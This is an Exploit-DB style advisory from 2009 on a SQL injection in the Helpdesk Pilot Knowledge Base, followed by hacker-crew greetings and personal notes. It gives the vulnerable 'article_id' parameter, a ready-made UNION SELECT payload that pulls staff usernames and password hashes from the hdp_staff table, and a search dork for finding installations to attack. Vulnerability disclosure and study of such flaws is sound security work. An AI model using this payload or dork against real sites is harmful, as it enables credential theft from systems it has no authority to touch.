exploit-db-mirror/exploits/php/webapps/10788.txt

#############################################################################
                                                                            #
[~] Helpdesk Pilot Knowledge Base SQL injection vulnerability - (article_id)#
[~] Author	: kaMtiEz (kamzcrew@gmail.com)                              #
[~] Homepage	: http://www.indonesiancoder.com                            #
[~] Date	: Desember 29, 2009                                         #
                                                                            #
#############################################################################

[ Software Information ]

[+] Vendor : http://www.helpdeskpilot.com/
[+] Download : -
[+] version : 4.4.0 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : 1. Standard = $299.95
            2. Professional = $399.95
            3. Corporate = $499.95
[+] Location : INDONESIA - JOGJA

#############################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/knowledgebase.php?act=art&article_id=[INDONESIANCODER]

[ Exploit ]

-666+union+select+concat_ws(0x3a,staff_username,staff_password)+from+hdp_staff--

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,cimpli
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] mungkinkah semua yang dulu tlah datang menghilang ku terus bertanya engkau dimana
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] HAPPY NEW YEAR ^_^
[+] Welcome 2010 .. lets r0x !
[+] Tukulesto : lets make it better ,, soon .. :P~~

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM